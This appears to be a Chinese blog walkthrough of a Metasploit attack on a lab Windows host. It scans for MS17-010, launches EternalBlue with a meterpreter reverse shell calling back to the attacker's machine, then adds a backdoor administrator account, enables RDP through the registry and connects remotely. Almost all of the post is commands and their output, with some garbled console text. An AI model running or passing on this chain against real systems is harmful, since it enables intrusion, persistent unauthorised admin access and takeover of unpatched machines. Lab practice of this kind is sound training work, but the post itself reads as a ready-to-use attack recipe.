msf对主机的渗透
程序员文章站
2022-07-15 14:12:00
...
msf对主机的渗透
1.开始启动msf。
aaa@qq.com:~# msfconsole
2.查看主机是否存在漏洞。
msf6 > search ms17
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.14
RHOSTS => 192.168.1.14
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
4.接下来就去开始配置exp,然后开干。
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.1.14
RHOST => 192.168.1.14
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
LPORT => 4444
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
然后开干。
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
5.然后拿shell。
meterpreter > shell
Process 1292 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
C:\Windows\system32>net user heihei 111 /add
net user heihei 111 /add
�����ɹ����ɡ�
C:\Windows\system32>net localgroup administrators heihei /add
net localgroup administrators heihei /add
�����ɹ����ɡ�
打开3389端口的命令。
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
6.看看3389端口是否开启
C:\Windows\system32>netstat -an
开了。那么接下来就可以干了。
7.远程连接靶机。
aaa@qq.com:~# rdesktop 192.168.1.14
完工。(对了,靶机的防火墙要关掉,不然没办法远程。)